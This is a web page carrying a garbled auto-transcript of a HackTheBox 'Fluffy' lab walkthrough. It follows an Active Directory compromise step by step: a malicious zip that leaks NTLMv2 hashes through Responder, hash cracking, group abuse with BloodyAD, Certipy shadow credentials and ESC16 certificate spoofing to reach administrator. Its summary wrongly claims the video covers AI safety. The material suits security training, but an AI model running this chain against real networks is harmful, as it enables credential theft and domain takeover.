HackTheBox - Fluffy
Key Takeaways
The video demonstrates a hack of the Fluffy system on HackTheBox using various tools and techniques such as BloodHound, Hashcat, and Metasploit to exploit vulnerabilities and gain access to the system. The video also covers topics related to AI safety and cybersecurity, including certificate-based authentication and Active Directory exploitation.
Full Transcript
What's going on YouTube? This is IPS doing Fluffy from Hack the Box, which is an easy assumed breach active directory box. Well, easy as long as you keep your tools up to date as the priv was ADCS ESC16. I know I read off a bunch of letters. That's active directory certificate services escalation number 16. And that's only available in recent versions of Certupy. And these certificate exploits are very hard to find manually. So, if you didn't update Certupy, you're just spinning your wheels for a long time. The box starts off with a set of credentials. You can find a PDF on a fileshare that indicates it's vulnerable to a recent CVE which would cause Windows to make an SMB request upon unzipping a specially crafted zip file. So you create that, upload it to a share get net nm v2 credentials which you can crack and gain access to an account that gives the ability to add itself to a group and can take over a few service accounts. One of these accounts we can perform ESC number 16 to get root. So with that being said, let's just jump in. As always, we're going to start off with an end map. So - sc for default scripts. SV enumerate versions vv for double verbose. This gives us things like the TTL 08 output all formats put in the end map directory and call it fluffy. And then the IP address of 10101.69. And I have a typer there. So I'm just going to fix it. This can take some time to run. So I've already ran it. Looking at the results, we can see 10 ports are showing as opened, right? Um the first one is going to be DNS on port 53. It's simple DNS plus which is the default banner for Active Directory. And I always just scroll down, look at LDAP. And we see there is a domain fluffy.htb. So I'm going to go ahead and add this to my host file. Also dco1. We have the fully qualified domain name right there. So let's do pseudo v etsy host. Then we can add 1010169 fluffy.htb. Let's do dcco1.fluffy.htb. And I'm just going to add dco1 as well. The three names that um can be applicable to this. Right. So, let's look at what else we have here. Uh, let's see. Um, Kerros, uh, the LDAP, it's showing that we do have a certificate authority on this box. So, we may want to run like certify things like that to just look at certificate configuration. I'll probably do that um later on because if we did all the recon possible for every single box, um, everything would take a while, right? But normally when I see that I normally run certify and just see what certificates are there, what type of enrollment rights, things like that, right? Uh let's see. We have LDAP. Again, this is going to be LDAP S. The main thing I'm looking for right now is like some type of web server or something like that. Uh we can see the box is 7 hours different from us. So if we do anything Keraros related, we probably should sync our time, right? Let's see. Um more LDAP again. Just kind of skipping over that. The clock skew and this host script results. So nothing really there, right? So um this is a assumed breach box. So we start off with a set of credentials. So I'm going to add this to a creds.ext just so I have them and don't have to keep going back to the page. So let's do creds.ext. Put this in. And we will add this password. Okay. So to start off, I always like just using net exec. So, do net exec SMB. Um, let's do DC01 fluffy HTB. I don't know why I keep saying fluffly, but there we go. J uh, fleshman NP. I think I stole my clipboard, right? And since it has a special character, I'm just going to put that in single quotes. And what I want to make sure now is um, we just have the credentials correct, right? And that we can access the box. Uh, there we go. It took a little bit, but we do have a successful authentication, right? So, one of the things I like doing is just testing for Kerros right off the bat. So, we can say LDAP and then say a dash dash ker roasting output.ext. And then we can also run rustound. Um, I like doing rustound over um what is it like the blood hound python collector because it collects a lot more things specifically certificate data. So, I just like using Rusttown, right? Uh, let's do domain fluffy. I typed that again. Uh, dash jmen. Hopefully, I did that correct. And put that password in. And this has errored because we have a clock skew. So, let's do pseudo NTP date and then fluffy. HTTP. That should set my time correctly. Run this again. And let's see, lap result. I wonder if that was also time related. We probably just typoed the username. So, let's do catcreds.ext. Let's go ahead and grab this and we can paste this in. There we go. So, Rust Hound is working. We do have some coarse creds. So, if I cat um output.ext text where it's saved. We have um a few like WinRM service. Let's see what else we have. Um going up LDAP service and CA service. So we have the certificate service, LDAP, and WinRM. So I'm going to just SCP this over to the Kraken. And this is just a box on my network where I run hashcat out of. You can do it on your local host. I just wouldn't recommend doing it in a VM because um VMs would like slow down the hash cracking process. Let's see. Let's go into hashcat. I'll copy it into hashes. And I'll call this um fluffy kb. I guess that seems fine. cd hashcat. And let's do dot /hashcat. I cannot type today. Um, put that there and then opt word list rocku.ext and let's see if we start cracking anything. Uh, we need to specify the hashcat mode. This is going to be a keraros 5. So I'm just going to do dashm 13100. Let that go. And we do have a bunch of files from blood hound. So let's go cdop bloodhound server docker compose up-d to start this service and none of these hashes cracked. So um it bought us nothing. We do have blood hound running now. So I'm going to do localhost 8088 because that's where I have blood hound configured to run. The default is 8080 but burpeet likes listening on that port. So I always change my blood hound to be 8088 just so those two don't conflict. Right. So I'm going to now go and ingest data. So we can go administration upload files. Uh let's go to ipsseack htb fluffy and copy all of these. I could have added like the dash z for zip and then just had one big zip. That's probably the easier way to do it, but I did not. So it is ingesting. Um, a video I would recommend if you wanted to run um, certify early would be uh, certifi jQ I guess if you go to IPSC.rocks and I'd go to watch this video, right? Because the user we have isn't going to be vulnerable. Um, so the exploit doesn't really stick out in the soda pie results. This video we talk about using jq to just show odd configurations of certificate data. I think specifically we're looking for any user that has enrollment rights that is non-default, right? So I would go look at this video, study up on that if you want to run Codapi when you first get a user account and um you can examine certificate information that way very easily. It says it is personally complete. So let's go down to explore and then I'm just going to search for the user I have which is that J uh Fleshman. And let's see we can click and I like looking at member of uh we are users domain users so no interesting groups outbound object control we can see what data we have um we can enroll certificates if we did the certify command invulnerable we don't really find anything um we could mark our user as owned and then go over to a cipher query and there's probably going to be like a shortest path from owned. Shortest path from let's see owned owned objects to tier zero. I think if we run either of these nothing really happens. Um I think that's actually erroring which is odd. There we go. Let's see what this shows. I'm a member of domain users which is a member of users. So this gives us nothing. Um, one thing we did not do, um, is look at the, uh, what is it? Let's go back to NXC the file shares, right? So, I can change this back to SMB. And if I do a D-shares, we can see if we have access to any of the file shares. Um, we could also use like SMB client for this as well. I think it's - J. Uh, f L EI like this. And then what is it? Fluffy HTB. I want to say it's a dash capital L. Uh, do we do it on this side? Maybe user is a capital U like this. Wow. I am There we go. So we can paste this password in and this will show near the same thing, right? Uh we see admin C dollar ipc it. I like using crackmap exec because it tells us the permissions, right? We have read write over the IT directory. So if I get rid of this and just do it, we should be able to access it. And it's worth noting if this was a file server, not a domain controller, this authentication would fail because I'm authenticating as work group. Um, the domain controller has no real concept of a domain, oddly enough, like local accounts work for it. So that's why this is working. But if it wasn't the domain controller itself hosting it, I would have to specify the domain, right? So I think if I do fluffy http and yeah, that should work. Uh, do I have the password? Do not have the password. Let's now put this in. Copy. Paste. So, this is the better way to access it. Right. So, now if I just take this dashl off, we could access the file share. If I do a diir, we can see we have everything key pass upgrade notice. So, I'm just going to get the PDF and then let's just open this PDF. Uh, upgrade notice. Did I not save it there? Where is my directory? Oh, I'm in Blood Hound server. Opt blood hound server upgrade notice. Copy it here. And now I can just open this. So looking at it, we have multiple high impact vulnerabilities have been publicly disclosed. So if we start scrolling down, we can see which vulnerabilities are talking about. They don't really give any details. So we could go and just go to like uh CVE details and then search each one like this um and try to figure out what it is. But I don't think this page actually tells you like if exploits are available if things like that. Um, so what I honestly do is just Google like GitHub PC for the CVE first to see if I can find a quick exploit on GitHub, right? And this isn't finding anything or did this uh oh, this is just Avon feed. Um, I'm just going to go over to Google. I don't like duck go for some reason. I think the search results aren't as good as Google for some reason. Um, and that's actually doing the same thing, but my eyes are used to seeing this page much more. And I do a search. Nothing's highlighted. So, I don't think this CVE has anything interesting. We do this one. Let's change out the CVE. Put this in. And I expected like my browser to highlight things. Uh, I guess it didn't. We do have a MSF Venom payload for this. So, there are various PC's. Um, I don't see the one I'm used to seeing. Let's see. This is also a good one. So, this is going to be a metas-ploit thing. Um, I don't like this page because it's not telling me like a good blog post that has a lot of information, but it's pretty easy to figure it out based upon the description, but this one has this blog from CTIM. Um, it's a domain, but it's a really good um blog post about it, right? Essentially, if we have a zip file and we put a specially crafted library ms inside of that, um when Windows unzips it, it's going to hit this URL. And because Windows likes doing um automatic login, if we point this at our box, then Windows will automatically attempt to log in with the user that um is logged in as, right? And that's how we get a NLM v2 hash and we can crack it, right? Um, this is mainly going to be a vector that you have to be on the same network or at least the same company network because when Windows sees a SMB path from a non-local address, so that's one that's not like 192 168 172610 uh 1010 like or that's something that's actually 10.0.0. So, um, if it's not one of those RFC19 addresses that are local, it's not going to automatically attempt to log in, at least to my knowledge. So, this would not work if we just crafted a zip file, had something listening on the internet. We couldn't just steal hashes, right? You have to be on the same um local network. That's not the same broadcast domain, which would be like um 192.1681 something in this example. It's just the same network that's also a local address. Um, hopefully that makes sense. But, uh, I can't copy and paste this screenshot, so I'm going to use the GitHub PC because it makes it easy. But essentially, all you're doing is, uh, creating a zip file, right? We can look at this p.py. And we see it's starting to create that XML. We have IP address here, and it's just going to compress a zip file for us, right? So, let's go ahead and clone this. So, I'm going to do a uh let's just do a new window. Get clone on this. Go into the CVE directory. Python 3 pc.py. Enter my file name. Um I'm going to call it malware.zip. Obviously, you wouldn't do that, but um my IP address is 1010148. And now, all we have to do is set up responder. So, let's do pseudo responder- ton zero. And I think that's all we have to do, right? Um, we have a SMB server on, so I don't think we have to specify any other options. Uh, I hope so. Do I have a SMB window open? I don't. We can, but let's go CD HTB fluffy before I do that. SMB client. Let's copy this password. capital J paste. There we go. DIR and I'm going to put malware.zip and see if anyone clicks it. Um, I probably have it in that CVE directory. So, let's copy that. Uh, ls CVE DC uh 7z L. I wonder if it just Okay, so it's malware.zip. Library MS. Um, so that's the file name. That's fine. So move this here. Put exploit.zip. So we have now put it in and we just want to wait to see if anyone makes a connection to us. Right. If I do ss lnttp g 445, we can see I am listening on ton0, which is 101048 on 445. So hopefully someone will make a connection within um I'm going to give it 2 minutes. So I can do sleep 120 and then I'm just going to take a look at this to make sure um nothing happens. Uh, we do have an email address. So, maybe we have to use something like SWAT and email the user, but I didn't see any like SMTP in my um end map report. So, I don't think it's going to be that type of thing. So, I'm going to pause the video and we'll resume when this sleep is finished. Literally, the second I clicked stop recording, um, we did get a hit. So, we have the NTLM v2 hash right here. So, I'm going to go ahead and grab this. Then we can say sh kraken cd um hashcat v hashes we called it fluffy dot um we'll do ntlmv2 paste this in dot slash hashcat the hash opt word list rocku.ext text and we'll see if this ends up cracking. Right. And while that starts, I'm going to copy this username. Uh, we can close this PDF out. We can go back to Blood Hound and pull up this user because if we get the user, what does this give us access to? That's my main question. So, we can start this. I'm just going to go ahead mark as owned. And if we don't crack it, then I'll probably unmark it. But let's see. Uh, we're member of three groups. So if I look at this um we're a member of service account managers. So that is what's different currently. If I look at outbound object control, we can see I'm a member of domain users. We saw that before with the last user, but we can see service account managers has generic all over service accounts. So that means we can add oursel to this group. So I'm just going to go ahead and also mark this group as owned. And then let's see um what we can do with this group. So if I click on it, then I'm going to go to um outbound object control. And we have generic right over three groups, CA, LDAP, and WinRM. Since we have generic write, this is going to allow us to um update the password for for these accounts. I'm going to use a um shadow password I think is what it's called. It's essentially configuring certificate login for these accounts. So that's going to enable me to gain access to the account without updating the password. So there's a less chance at breaking services, right? Um whenever you can use the shadow one, I'd highly recommend it because if you just update the password, um if anyone goes to use it, then it breaks, right? like if they're using this LDAP service account in um applications and they're using that as like the bind so the application can authenticate against active directory. You change that password, you're creating a huge outage. So um that's why I'm going to avoid that. Looking at hashcat, we have recovered one out of one. I'm just going to delete this word list and we'll do a d-shell and we'll get this password right pagala and that's uh prometheus x303. So let's go ahead stop a responder. I'm going to do vcreds.ext. We can say p agula. Put this password in. And then I'm just going to do nxc bluffy.htb p agula p like this. Just make sure the credential works. Give it a second. I don't know why this is taking its time, but we do have the um credential. So, let's go ahead and take over these accounts. Um you don't need the winrm. This is going to be where user.ext is. So, that's the one I'm going to start out with. Um but the main step is going to be the CA service. So, we're going to take over both of these accounts. Uh so, the first step is we have to add oursel to that group, right? Um let's do pathf finding. I'll copy this start node that and then end node is going to be winrm and this will really easily put this path in a visible format. Right? So we're a member of this. Let's go ahead and make it so it's a bit easier for you to see. So I think if I do this that'll let me zoom and we can see the entire path, right? There we go. So, we're going to since we're a member of this, we're going to add oursel to the service account group and that's going to allow us to generic right over winrm service. And essentially um that's how we get the shadow credential. So, the first step is uh to add oursel to the service accounts and I'm going to use bloody ad to do that. Uh bloody ad. And we can say dash u p agula-p uh we don't have that password in my clipboard anymore do we? Nope. So let's go ahead and copy this paste. And then what do we need next? The domain fluffy htb. The host is going to be 1010 1169. I don't know if I need that. I'm just in a habit of uh supplying it. And I typer this domain differently. Man, I just cannot type that. So we're going to do add group member service accounts and then the user we want to add which will be herself P A and we have a typo somewhere. Um I'm guessing add group member has a casing. Yeah, the M is capital. I really hate that about Bloody AD. The commands are case sensitive. So now we have added ourself to that group which means we'll be able to use um certify to create the shadow credential. So certify shadow um pilla fluffy http password prometheus x. Um we'll do account winrm svc dcip 1010 1169. Uh let's see we missed something. What did I miss? Uh, typo and typo. Did I say I'm having problems typing today? Uh, so we have that. I'm going to go ahead and just copy this command because it does take a second for that to work. And while that does, I'm going to request something for the CA service as well. So, we'll have both of these. Um, this is going to give us the uh TGT hash for these accounts, right? So, we have the um NLM hash here vS.ext. We'll do win rm svc. Paste that in. CAVC. And we will paste this in. Okay. Save. And then we could just do like evil winrm i 1010 1169 user win rm svc. I want to say it's a dash capital h right is that hash. There we go. So this is how you could get user.ext. I think that's in desktop like that. So that would be that. But the next step is abusing the certificate account, right? So if we just looked at um CA SVC, do this and then we'll do kind of the same thing. Look at our outbound object control. See what this account can do. Uh we have generic right over to users. Um we can enroll in those certificates. We can also enroll in the CA, but nothing really stands out here. And Blood Hound currently doesn't show um the ADCS um I think it's ESC9 or 16. I think it's the 16 attack. Um Blood Hound doesn't currently show it. So that's why we don't have it in this interface. And at the time of release, um you had to grab a version of Certupy from like one or two weeks in order for it to show up in Certupy. Um so this was a relatively new attack when the box released. But if I do certify now we can do certify um find dash uh what is it? Username cvvc uh hashes. Do I have this hash? I think this is the right No, that's the win rm because I just um logged in. Let's go ahead and grab this hash. There we go. So, we have the hash. Uh, we want to specify the CA, which is fluffy DC1CA. So, we can say fluffy DC1 CA. I think I typed that right. That looks good. And then after this, uh, what do we need? Uh, DCP 10169-vulnerable. Actually, I don't specify the CA here. because it's going to look at everything. Can I though? No. I think that's all I need. There we go. So, it's connecting remote registry. And once this finishes, it should highlight the vulnerable certificates. I think certify now by default just puts it into an output file. So, we'll just be able to read that and then see what we have. web enrollment. I don't know if um that's probably because the web server is not online. So we have written to soda pi. So let's go and cat this uh 203 and we'll do text. Here we go. So we have ESC16 because the security extension is disabled. This is going to be very similar to the um certified video which was ESC9. The difference between ESC16 and ESC9 is ESC16 is configured on the certificate authority itself. So all certificates are vulnerable. ESC9 is on the template itself. Um and because our account is a member of certificate publishers, that's what's going to enable this, right? Um, if we ran certify from any other account, it wouldn't show as vulnerable because that account is not a member of certificate publishers. Um, we could also be a member of administrators enterprise admin, but if we were, then we won't have to use this exploit. But essentially, um, ESC9 and 16 allows the security extension. Um, it's a weak mapping in active directory. And by that I mean it's going to trust the user principle name in order to map an account. Um I want to say the strong mapping requires the SID of that user the like s dash um that long unique name. It's just a more secure um place to put it. Right. So we'll show this in a minute. Let's see if I can quickly find um a blog post for you to read. uh it's probably going to be the certifi wiki. So I would highly recommend just reading these if you want uh more information, but we'll go ahead and exploit it and hopefully it makes sense as we go through it, right? Uh so let's go ahead and do this. So what we have to do first is update the um user principle name for an account, right? And we could do that from the P um agile account, right? Because that's the one that had the um generic, right? Right. So if I went to path finding, is this still here? Let's do P A this generic. Right. Come on. Right? Because we have right access over these accounts, we can update the user principle name. So I'm going to update the user principle name for the CA service to be administrator. And then we're going to request a certificate. In that certificate, it's going to say the subject alternate name is administrator. Then when we use that certificate, it's going to map that administrator user and let us in as them. So that is the attack in a nutshell. So, if it doesn't make sense after watching the video, I'd highly recommend going to the certified video because I also do the uh very similar attack there. So, I'm first going to do is uh let's see um let's do a um soda pi account u pgula. Uh the password let's do cat creds this put this in uh DC IP 1010 11169 we'll do dash user CA service read so we can see what the current user principle name is it is going to be CA service at fluffy.htb HTB. It's also worth noting if we were doing it to an account that wasn't a domain administrator, we couldn't have the um domain here, right? Um Windows will treat both CA service and CA service at fluffy.htb as the same thing. If we try to update it to a um UPN that already exists, we'd get a violation constraint, right? So, if you ever do this attack, you get a violation constraint. I would just change it to be either the fully qualified name, adding the domain to it, or taking the domain off of it. Um, so let's see. We can say the account and we'll do uh dash UPN. Um, I'll show you the extra real quick. So if we do win service um uh what is it? WinRM SVC. I think that's the account that already exists. Um, let's do update. This should allow it. Uh, we have to add oursel to the group. because hygiene um like a script automatically cleaned up the box. So, let's do uh what is it? Buddy A D-up Agula. Um do I have that password? I do. Dash account. Oh no. Um, Prometheus domain fluffy http host 1010 1169 add group number service accounts agula uh what uh typo there we go. So now when I do this, it's going to succeed, right? Because um the UPN for this was the fully qualified name. If I try to update this to be fluffy.htb, this is going to be where it errors. We have a constraint error because that is a unique field. So if you ever see that, I just swap out between the two. But we're going to change our UPN to be administrator. Administrator. Okay. So, now that we do this, now we want to request a certificate. So, we can do certify request- and we're going to do it as the CA service user um hashes. Let's go ahead and grab this hash and then CA. This is the fluffy DC01CA. The template um I want to say that was the user template. The UPN is going to be administrator DCIP 10169 uh UPN. So, this is going to request a certificate and we're going to get the UPN of administrator because that's what we set our UPN to for this user. And if I want to, we could use um open SSL PKCS12 in administrator. You don't have to do this. What I'm going to do is just show what the certificate looks like. Um do no keys because I don't care about the private keys. That puts it in the x509 format which lets us dump things. Um no out. This is going to hide some B 64 output and text or make it readable. So if I look at the certificate and we look at the subject alternate name, it is administrator. So this is going to be what our certificate uses to authenticate. And if we attempted to authenticate right now, um it would fail because if we look at our CA service, uh the UPN is currently administrator and we'd attempt to use certificate, it would map to this user and fail. Um, we can show that real quick. As long as like the cleanup script doesn't fix what we just did. So, we'll do uh what is it? Um, certify O DC IP 1010169. The file administrator pfx. The username is administrator and the domain is fluffy http. Um, there we go. So, this fails. Now, what I'm going to do is that update command again, and we're going to uh let's see. Was it bloody AD I used? There we go. So, this UPN can be anything we want. I'm just going to put it back to CA service. And now because the certificate for the CA service account um or this UPN doesn't match that um UPN, it's going to default to the domain admin and that's what's going to let us in, right? Uh so hopefully that makes sense, right? Um the certificate says word UPN of administrator. Currently the CA service account had that UPN so it mapped to that. um the domain administrator also had that UPN but it just went to the CA service first once we killed that confliction. Um now the certificate just let us in as administrator. Uh hopefully that makes sense. I don't know easy way to explain that. Um but let's go evil winrm i administrator uh dash i the IP address- u administrator p uh capital h for hash do this and this is going to let us in as administrator which then we can go to desktop and read the uh flag. So that's gonna be the video. Hope uh it all made sense and you enjoyed it. Take care and I will see you all next
Original Description
00:00 - Introduction
00:52 - Start of nmap
03:15 - Running NXC with the credentials we are given and kerberoasting
06:20 - Running Rusthound, still not finding all that much
09:12 - Looking at file shares, discovering a PDF on a writable share that states the server is vulnerable to CVE-2025-24071
13:50 - Making a malicious zip file by putting the .libary-ms file inside of the zip that points to our box, using responder to steal and crack the hash
18:50 - Identifying P.AGILA can add themself to Service Account Managers and take over Service Accounts
22:22 - Using BloodyAD to add ourself to a group, then certipy to use shadow credentials to obtain NTLM Hash over an account we have GENERIC WRITE to
26:00 - Using Certipy to identify and exploit AD ESC 16
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
More on: Tool Use & Function Calling
View skill →Related AI Lessons
⚡
⚡
⚡
⚡
eCPPTv3 Review
Medium · Cybersecurity
Next-Gen Endpoint Protection Software: Securing Remote Employees Against Modern Cyber Threats
Medium · Cybersecurity
Understanding NAT (Network Address Translation): How Multiple Devices Share a Single Public IP…
Medium · Cybersecurity
Why the EC-Council 312-41 Practice Test Is Essential for Certification Success
Dev.to AI
Chapters (9)
Introduction
0:52
Start of nmap
3:15
Running NXC with the credentials we are given and kerberoasting
6:20
Running Rusthound, still not finding all that much
9:12
Looking at file shares, discovering a PDF on a writable share that states the
13:50
Making a malicious zip file by putting the .libary-ms file inside of the zip t
18:50
Identifying P.AGILA can add themself to Service Account Managers and take over
22:22
Using BloodyAD to add ourself to a group, then certipy to use shadow credentia
26:00
Using Certipy to identify and exploit AD ESC 16
🎓
Tutor Explanation
DeepCamp AI